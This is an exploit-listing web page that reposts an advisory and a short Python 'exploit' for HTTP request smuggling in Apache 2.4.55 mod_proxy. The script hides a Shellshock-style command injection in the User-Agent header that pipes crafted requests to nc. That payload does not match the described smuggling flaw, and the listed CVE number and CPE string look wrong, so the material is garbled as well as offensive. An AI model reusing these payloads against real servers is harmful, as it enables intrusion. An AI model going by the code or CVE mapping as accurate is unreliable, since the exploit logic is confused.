Advertisement






Apache 2.4.55 mod_proxy HTTP Request Smuggling

CVE Category Price Severity
CVE-2021-35028 CWE-93 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2024-01-02
CPE
cpe:cpe:/a:apache:http_server:2.4.55
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010008

Below is a copy:

Apache 2.4.55 mod_proxy HTTP Request Smuggling
# Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through
# 2.4.55 allow a HTTP Request Smuggling attack. Configurations are affected
# when mod_proxy is enabled along with some form of RewriteRule or
# ProxyPassMatch in which a non-specific pattern matches some portion of the
# user-supplied request-target (URL) data and is then re-inserted into the
# proxied request-target using variable substitution. For example, something
# like: RewriteEngine on RewriteRule "^/here/(.*)" "
# http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/
# http://example.com:8080/ Request splitting/smuggling could result in bypass
# of access controls in the proxy server, proxying unintended URLs to
# existing origin servers, and cache poisoning. Users are recommended to
# update to at least version 2.4.56 of Apache HTTP Server.

import requests

def send_exploit(proxy_url):
    exploit_headers = {
        'User-Agent': '() { :; }; /bin/echo -e "GET /here/../here HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /nonexistent HTTP/1.1\r\nHost: www.example.com\r\n\r\n" | nc example.com 80',
        'Connection': 'close'
    }

    exploit_url = 'http://example.com/here/../here'
    response = requests.get(exploit_url, headers=exploit_headers, proxies={'http': proxy_url, 'https': proxy_url})

    print(response.text)

# Usage
send_exploit('http://localhost:8080')

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum